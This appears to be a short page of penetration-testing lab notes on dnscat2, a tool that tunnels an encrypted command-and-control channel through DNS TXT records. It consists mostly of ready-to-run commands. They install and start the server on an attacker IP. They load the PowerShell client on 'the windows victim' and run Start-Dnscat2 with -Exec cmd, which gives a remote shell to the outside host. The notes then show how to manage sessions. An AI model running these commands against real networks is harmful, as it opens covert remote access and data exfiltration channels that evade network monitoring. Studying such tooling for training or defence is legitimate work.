DNScat2

Tunneling tool that send data via an encrypted C2 channel. It send the data inside the TXT records.

Setting up dnscat2

$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server/
$ sudo gem install bundler
$ bundle install

Starting the dnscat2 server

$ sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache

After running, take note the secret key

Importing dnscat2.ps1

$ git clone https://github.com/lukebaggett/dnscat2-powershell.git

transfer the dnscat2.ps1 to the windows victim

PS C:\htb> Import-Module .\dnscat2.ps1
PS C:\htb> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd

dnscat2 commands

dnscat2> ?

Here is a list of commands (use -h on any of them for additional help):
* echo
* help
* kill
* quit
* set
* start
* stop
* tunnels
* unset
* window
* windows

Interacting with the established sessions

dnscat2> window -i 1
PreviousNetshNextChisel

Last updated